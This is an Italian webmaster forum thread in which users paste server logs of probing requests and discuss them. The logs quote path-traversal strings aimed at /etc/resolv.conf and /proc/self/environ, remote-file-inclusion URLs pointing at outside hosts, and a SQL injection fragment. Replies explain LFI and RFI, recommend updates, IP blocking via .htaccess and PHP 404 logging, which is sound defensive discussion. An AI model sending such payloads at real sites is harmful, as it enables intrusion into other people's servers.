Strane richieste da un IP

[andreafallico]

Oggi da questo IP 69.16.239.36 (host.futuregrid.net) ricevo strani request_uri, cioè

miapagina.php/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf

quello in rosso è la parte in più; secondo voi cosa può essere?

anche errori 404 -> /test.php?page=./../../../../../../../../../../../../../../../../etc/resolv.conf

Un tentativo maldestro di sfruttare register_globals per fare danni, ma non credo che sia andato a buon fine. Ti consiglio di bannare quell'IP dal tuo sito.

Un tentativo di hacking è sicuro. Io ti consiglierei di stare attento se usi joomla, aggiorna tutto all'ultima versione ...ciao!!

[andreafallico]

Non so più che fare mi sta riempiendo i log degli errori e d'accesso.

[darkwolf]

Io ricevo da sempre errori simili :P
Probabilmente sono spam-bot che scansionano i siti per tentare un "attacco" e quindi riempire il sito/forum di schifezze.
Comunque sembra essere un buon segno (evidentemente il tuo sito cresce :P)
Solo poche ore:

Codice:

Utente  Visitatore - Ieri alle 22:02:17
indirizzo IP 196.40.83.71
URL ****altervista.org/index.php?action=error;code=404
Error 404 - Not Found (****altervista.org//login.php?dir=http://musicadelibreria.net/footer??)
File: user

Utente Visitatore - Ieri alle 22:02:16
indirizzo IP 196.40.83.71
URL ****altervista.org/index.php?action=error;code=404
Error 404 - Not Found (****altervista.org/phpinfo//login.php?dir=http://musicadelibreria.net/footer??)
File: user

Utente Visitatore - Ieri alle 22:01:26
indirizzo IP 196.40.83.71
URL ****altervista.org/index.php?action=error;code=404
Error 404 - Not Found (****altervista.org/phpinfo//login.php?dir=http://musicadelibreria.net/footer??)
File: user

Utente  Visitatore - Ieri alle 23:07:07
indirizzo IP 206.168.219.110
URL ****altervista.org/index.php?action=error;code=404
Error 404 - Not Found (****altervista.org/phpinfo/%22%20class=77+and(select+count(*)+from+Pablin77)--)
File: user

Utente Visitatore - Ieri alle 23:04:27
indirizzo IP 212.235.107.17
URL ****altervista.org/index.php?action=error;code=404
Error 404 - Not Found (****altervista.org/antivirus-and-sicurezza/avira-antivir-7/%2B%255bPLM=0%255d%255bR%255d%2BGET%2Bhttp:/****.altervista.org/forum/register/%2B%255b0,36023,1591%255d%2B-%253e%2B%255bR%255d%2BPOST%2Bhttp:/****.altervista.org/forum/register2/%2B%255b0,0,30406%255d%2B-%253e%2B%255bL%255d%2BGET%2Bhttp:/****.altervista.org/forum/login/%2B%255b0,18883,31846%255d%2B-%253e%2B%255bL%255d%2BPOST%2Bhttp:/****.altervista.org/forum/login2/%2B%255b0,0,21054%255d%2B-%253e%2B%255bN%255d%2BGET%2Bhttp:/****.altervista.org/forum/antivirus-and-sicurezza/avira-antivir-7/%2B%255b0,122236,134222%255d%2B-%253e%2B%255bN%255d%2BPOST%2Bhttp:/****.altervista.org/forum/antivirus-and-sicurezza/avira-antivir-7/?action=quickmod2%2B%25255BR=302%25255D%25255B11927,0,302%25255D)
File: user

Utente Visitatore - Ieri alle 22:13:59
indirizzo IP 217.171.66.245
URL ****altervista.org/index.php?action=error;code=404
Error 404 - Not Found (****altervista.org/tpmod/index.php?pagina=../../../../../../../../../../../../../proc/self/environ%00)
File: user

Utente  Visitatore - Oggi alle 00:42:23
indirizzo IP 76.73.36.114
URL ****altervista.org/index.php?action=error;code=404
Error 404 - Not Found (****altervista.org/board.php?see=./../../../../../../../../../../../../../../../../etc/resolv.conf)
File: user

Utente Visitatore - Oggi alle 00:42:23
indirizzo IP 76.73.36.114
URL ****altervista.org/index.php?action=error;code=404
Error 404 - Not Found (****altervista.org/robots.txt/board.php?see=./../../../../../../../../../../../../../../../../etc/resolv.conf)
File: user

Utente Visitatore - Oggi alle 00:42:21
indirizzo IP 76.73.36.114
URL ****altervista.org/index.php?action=error;code=404
Error 404 - Not Found (****altervista.org/board.php?see=./../../../../../../../../../../../../../../../../etc/resolv.conf%00)
File: user

Utente Visitatore - Oggi alle 00:42:21
indirizzo IP 76.73.36.114
URL ****altervista.org/index.php?action=error;code=404
Error 404 - Not Found (****altervista.org/robots.txt/board.php?see=./../../../../../../../../../../../../../../../../etc/resolv.conf%00)
File: user

Un tentativo di LFI

Scusate, come si fanno a vedere questi tentativi di accesso?

[alemoppo]

Era già capitato qui sul forum queste segnalazioni, ma a cosa sevono? Cioè se vanno alle cartelle superiori, cosa sperano di fare??...e poi tanto sono bloccate perché non si può accedere oltre!

Non capisco il senso di questi attacchi... Cosa contiene quel file che tentano di aprire? Esiste?

[saitfainder]

Non capisco il senso di questi attacchi... Cosa contiene quel file che tentano di aprire? Esiste?

/etc/resolv.conf contiene i server DNS utilizzati dalla macchina. Un file innoquo preso di mira penso solo per testare l'attaccabilità del server.

Volendo potete bloccare utenti con determinati indirizzi IP via htaccess:

Codice:

order allow,deny
allow from all
deny from xxx.xxx.xxx.xxx

alemoppo, alcuni sono tentativi di LFI (Local File Inclusion), altri di RFI (Remote File Inclusion) e alcuni tentano ad accedere a file di sistema. La maggior parte delle volte questi tentativi falliscono, ma quando vanno a buon fine possiamo dire che sono cavoli amari per il webmaster. La cosa che non capisco è che senso ha divertirsi a distruggere il lavoro altrui. Tanto anche se inserisci 10.000 link al tuo sito nelle mie pagine tutti penseranno che sei comunque un imbecille, quindi non vedo che cambia. Mah...

[andreafallico]

Quasi ogni giorno tentano:

85.17.199.105 - shared03.neostradainfra.nl - 22 December 2009 00:20:58 - - HTTP/1.1 404 Not Found GET - /locateIp.php//?_SERVER[DOCUMENT_ROOT]=http://www.gastatedar.org/mambo/zfxid1.txt??? - Array() - Mozilla/5.0

In che senso "nella maggiorparte delle volte non vanno"?
Cioè dipende dai casi? Oppure serve una protezione per il sito per evitare che succeda?
Come posso creare dei log degli accessi e monitorare eventualmente anche questo tipo di attacchi?
Mi appresto a fare un sito serio (che spero riuscirò a mantenere) e vorrei sapere tutto sulla sicurezza.

[alemoppo]

In che senso "nella maggiorparte delle volte non vanno"?
Cioè dipende dai casi? Oppure serve una protezione per il sito per evitare che succeda?
Come posso creare dei log degli accessi e monitorare eventualmente anche questo tipo di attacchi?
Mi appresto a fare un sito serio (che spero riuscirò a mantenere) e vorrei sapere tutto sulla sicurezza.

...Comunque sia, hai detto che vuoi fare un sito serio, ma sappi che non esiste un modo per essere protetti alla perfezione: ci sarà sempre un limite di protezione ad un sito o qualsiasi cosa non potrà essere protetto "in assoluto".

Comunque, puoi fare come dice saitfander...ovvero bloccare gli IP che fanno tali tentativi...

genuzzu, nella maggior parte dei casi non funzionano perché quei bot vanno "a tentativi". Controllano che sul tuo spazio FTP ci sia qualche file infetto e tentano di eseguirlo, ma non lo trovano. Poi provano a sfruttare qualche vulnerabilità nel tuo CMS per vedere se va a buon fine, ma molte volte non succede. Anche se è raro un attacco andato a buon fine, è un fattore sempre da tenere in considerazione!

Succede anche a me che qualcuno provi ad attaccare il sito o il server, ma non ci do mai tanto peso. Ti consiglio, se è sempre lo stesso IP che ti attacca, di bloccarlo in qualche modo come già suggerito. Ciao!

Ma come faccio a monitorare le richieste?

[mycarlo]

Con php, quando si raggiunge la pagina di errore con php salvi alcune informazioni (io le salvo in un file txt).

Ad esempio:

Codice PHP:

file_put_contents("404_log.txt", "{$_SERVER["REMOTE_ADDR"]} | {$_SERVER["REQUEST_URI"]} | {$_SERVER["HTTP_USER_AGENT"]}\n", FILE_APPEND | LOCK_EX);